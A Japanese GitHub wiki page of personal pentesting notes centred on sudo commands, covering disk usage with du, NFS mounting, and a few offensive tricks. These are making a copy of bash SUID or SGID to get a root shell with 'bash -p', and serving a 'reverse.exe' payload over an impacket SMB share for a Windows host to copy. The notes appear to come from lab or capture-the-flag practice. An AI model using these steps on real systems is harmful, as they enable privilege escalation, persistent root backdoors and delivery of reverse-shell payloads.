sudo - yokohama/oreshic-record GitHub Wiki
sudo -l で現在のユーザーが sudo 経由で実行可能なコマンド一覧を表示する。
sudo -l既定値のエントリと照合中 (ユーザー名 hoge) (ホスト名 kali):
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
ユーザー hoge は kali 上で コマンドを実行できます
(ALL : ALL) ALL{none}
du でディスク使用量を確認する。
-h で人間可読形式、-d 1 で1階層のみ表示する。
特定ディレクトリ直下の容量調査に便利。
sudo du -h -d 1 /opt876M /opt/BurpSuitePro
12M /opt/mdcat-2.7.1-x86_64-unknown-linux-gnu
60M /opt/nvim-linux-x86_64
12K /opt/containerd
947M /optdu,デスク,使用量
mount を使用してNFS共有をマウントする。
-t nfs でタイプ指定、-o vers=3,nolock でNFSバージョンやロック動作を調整する。
サーバー設定によって vers=2/3/4 や nolock の有無を変更する必要がある。
sudo mount -t nfs -o vers=3,nolock 10.49.164.155:/tmp ./mountnfs
chmod u+s でSUIDビットを付与する。
実行時にファイル所有者の権限で動作するようになる。
権限昇格検証やSUID悪用検証で使用する。
bash に、suid をつけると、 bash -p でroot権限で実行できる。
sudo chmod u+s ./bashbash,sudi,priv
chmod g+s でSGIDビットを付与する。
実行時にファイルのグループ権限で動作する。
bash に、sgid をつけると、 bash -p でroot権限で実行できる。
sudo chmod g+s ./bashbash,sgid,priv
du と sort を組み合わせてルート直下のディスク使用量を確認する。
-x で同一ファイルシステムのみ、--max-depth=1 で1階層表示。
容量の大きいディレクトリを特定する際に使用する。
sudo du -xh / --max-depth=1 | sort -h6.9M /etc
230M /tmp
947M /opt
3.0G /home
2.0M /boot
16G /var
4.0K /media
9.9G /usr
8.0K /mnt
140K /root
16K /lost+found
4.0K /srv
30G /-
kali: windowsから見える共有名。1 -
.: 共有するパス。この場合はカレントディレクトリ。
windowsからは以下のコマンドで、ファイルの取得が可能。
copy \\10.10.10.10\kali\reverse.exe C:\Temp/reverse.exesudo -S python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .[sudo] password for banister:
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
^C
Interrupted, exiting...
samba,SMB,共有